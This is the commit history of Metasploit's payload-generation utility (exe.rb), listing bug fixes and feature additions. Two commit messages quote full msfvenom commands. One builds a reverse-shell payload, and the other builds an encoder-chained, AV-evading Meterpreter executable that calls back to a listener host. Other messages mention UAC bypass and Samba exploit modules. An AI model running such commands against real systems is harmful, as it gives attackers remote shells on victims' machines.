Nathan
2d7c075f81
undefined method `to_linux_armle_elf_dll' for Msf::Util::EXE:Class
...
```
msfvenom -p linux/armle/shell_reverse_tcp lport=1337 lhost=192.168.1.100 -f elf-so > shell.so
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: armle from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 172 bytes
Error: undefined method `to_linux_armle_elf_dll' for Msf::Util::EXE:Class
Did you mean? to_linux_armle_elf
to_linux_x64_elf_dll
to_linux_x86_elf_dll```
2019-02-03 16:34:30 +11:00
Brent Cook
b3118193e8
add todo comment on require
2018-04-24 08:22:31 -05:00
scriptjunkie
bc07ba3769
load only at use to break require loop
2018-04-10 21:05:41 -05:00
scriptjunkie
2ea875d304
Fix issue preventing psexec against non-powershell targets
2018-04-09 22:01:49 -05:00
Meatballs
cac0587d42
Fix no-uac msi creation
2018-04-02 19:29:16 +01:00
Wei Chen
6fe8691528
Fix #9090 , honoring retry counts for x86/64 payloads
...
Fix #9090
2018-02-15 13:52:34 -06:00
Tim
4ec0faf35d
fix aarch64 cmdstager
2017-11-15 16:47:17 +08:00
Evgeny Naumov
d5cdd2567a
add missing method
2017-10-16 16:01:53 -04:00
bwatters-r7
7df18e378d
Fix conflicts in PR 8509 by mergeing to master
2017-10-09 10:30:21 -05:00
Tim
86ee77ffb0
add aarch64 nops and fix aarch64 cmdstager
2017-08-31 18:48:58 +08:00
Tim
8b4ccc66c7
add linux/aarch64/shell_reverse_tcp
2017-08-17 18:55:37 +08:00
Brent Cook
f5e76092d6
Merge branch 'master' into land-8439-
2017-07-18 08:25:18 -05:00
L3cr0f
6a3fc618a4
Add bypassuac_injection_winsxs.rb module
2017-06-03 12:59:50 +02:00
Tim
32a83e0d30
update macho check for 32bit + fat
2017-05-30 14:00:24 +08:00
HD Moore
0520d7cf76
First crack at Samba CVE-2017-7494
2017-05-24 19:42:04 -05:00
Tim
d333077308
osx meterpreter
2017-05-23 14:23:22 +08:00
Tim
a68a1858a9
Fix #7703 , mark osx-app macho as executable
2017-05-18 18:24:35 +08:00
nixawk
484a545629
Replace exe.rb double variable declare
2017-04-16 22:38:49 -05:00
Elijah Frederickson
9e89567ce5
Fix #8191 (msfvenom cannot create exe-service)
...
Fixes issue #8191 : Cannot create exe-service from msfvenom
2017-04-05 12:49:46 -04:00
Brent Cook
8995629037
Land #7061 , allow chaining the service stub with other encoders
2017-03-15 13:56:09 -05:00
Brent Cook
f69b4a330e
handle Ruby 2.4 Fixnum/Bignum -> Integer deprecations
2017-01-22 10:20:03 -06:00
Adam Cammack
1ec7474067
Don't embed ELFs in ELF templates
2016-12-06 14:14:40 -06:00
Brent Cook
f313389be4
Merge remote-tracking branch 'upstream/master' into land-7507-uuid-arch
2016-11-20 19:08:56 -06:00
David Maloney
451686309b
fixes #7519 psh payload generation
...
a few files references to the templates for pwoershell were
missed when transfering the templates over to the rex-powershell gem
2016-11-01 14:32:40 -05:00
OJ
1d617ae389
Implement first pass of architecture/platform refactor
2016-10-28 07:16:05 +10:00
David Maloney
af4f3e7a0d
use templates from the gem for psh
...
use the templates now contained within the magical
gem of rex-powershell
7309
MS-2106
2016-10-04 14:14:25 -05:00
dmohanty-r7
4c4f2e45d6
Land #7283 , add jsp payload generator
2016-09-16 14:37:59 -05:00
Christian Mehlmauer
c6012e7947
add jsp payload generator
2016-09-06 22:17:21 +02:00
William Vu
954dee752b
Sort msfvenom --help-platforms
...
Also sort --help-formats.
2016-08-25 14:02:58 -05:00
Brendan
ee40c9d809
Land #6625 , Send base64ed shellcode and decode with certutil (Actually MSXML)
2016-07-28 13:01:05 -07:00
agix
378208bc3d
Move service stub in x86 encoder to be easily used.
...
Add psexec option SERCVICE_STUB_ENCODER to allow a list of encoder to
encode the x86/service stub.
Add multiple_encode_payload function in payload_generator.rb to accept a
list of encoder (beginning with @ to not break the classic parsing of
encoder).
With this it would be possible to pass multiple encoder to msfvenom in
one execution.
./msfvenom -p windows/meterpreter/reverse_tcp LPORT=80
LHOST=192.168.100.11 -e
@x86/shikata_ga_nai,x86/misc_anti_emu:5,x86/shikata_ga_nai -x
template.exe -f exe-only -o meterpreter.exe
2016-06-23 14:56:03 +02:00
David Maloney
1e053c110a
Merge branch 'master' into feature/rex-cleanup/first-gems
2016-06-22 09:20:44 -05:00
David Maloney
69e2d05a5d
rip out old rex code and replace with gems
...
rex-text, rex-random_identifier, rex-powershell, rex-zip, and rex-registry
are now being pulled in as gems instead of part of the spgehtti code that is lib/rex
2016-06-21 13:56:36 -05:00
wchen-r7
129b449355
Add Msf::Util::EXE.to_zip
...
This adds a new method in Msf::Util::EXE to be able to create a
zip file with an array of binary data.
2016-06-20 13:36:59 -05:00
Christian Mehlmauer
7fcddd5a05
Add axis2 payload generator
2016-05-12 22:48:07 +02:00
Christian Mehlmauer
e2dd844e34
reenable jar format
2016-05-09 21:25:23 +02:00
Brent Cook
57ab974737
File.exists? must die
2016-04-21 00:47:07 -04:00
f7b053223a9e
629bc00696
Use MSXML decoder instead
2016-03-25 22:52:16 +09:00
f7b053223a9e
c8c5549b19
Send base64ed shellcode and decode with certutil
2016-03-01 10:48:25 +09:00
wchen-r7
0e121df69d
Need a default template
...
The set_template_default actually needs the second argument,
otherwise we hit a RuntimeError.
2015-11-12 15:17:03 -06:00
wchen-r7
aaea730508
Fix #6213 - Method to_linux_x86_elf fails to set set :template
...
:template by default is just the base name of the file, not the
fullname. Before we use it, we need to normalize it. Methods
in this class rely on set_template_default for normalization (
which can also handle a custom path), so we'll just use that too.
Fix #6213
2015-11-12 15:07:58 -06:00
wchen-r7
0bf20993ec
Fix more doc
2015-09-18 13:35:31 -05:00
Brent Cook
470779aae7
some doc fixes
2015-08-14 16:36:41 -05:00
Mo Sadek
802e35ff67
YARD Documentation for EXE.rb
2015-08-11 11:48:35 -05:00
g0tmi1k
37546c7e18
to_exe_vbs - Allow for exe_filename to be defined
2015-06-17 01:13:33 +01:00
g0tmi1k
b40e9f6d46
util/exe - replace tabs with spaces
...
...formatting should be okay still
2015-06-17 01:10:18 +01:00
wchen-r7
5a6a16c4ec
Resolve #4326 , remove msfpayload & msfencode. Use msfvenom instead!
...
msfpayload and msfencode are no longer in metasploit. Please use
msfvenom instead.
Resolves #4326
2015-06-08 11:30:04 -05:00
wchen-r7
737559bcbb
Land #5180 , VBA Powershell for Office Macro
2015-05-28 19:55:27 -05:00
HD Moore
9b17b63259
Switch to append mode for x86 service templates, fixes #5403
2015-05-21 20:42:20 -05:00
HD Moore
ea9059f930
Fix broken endian specification (<I vs I<)
2015-05-21 20:00:22 -05:00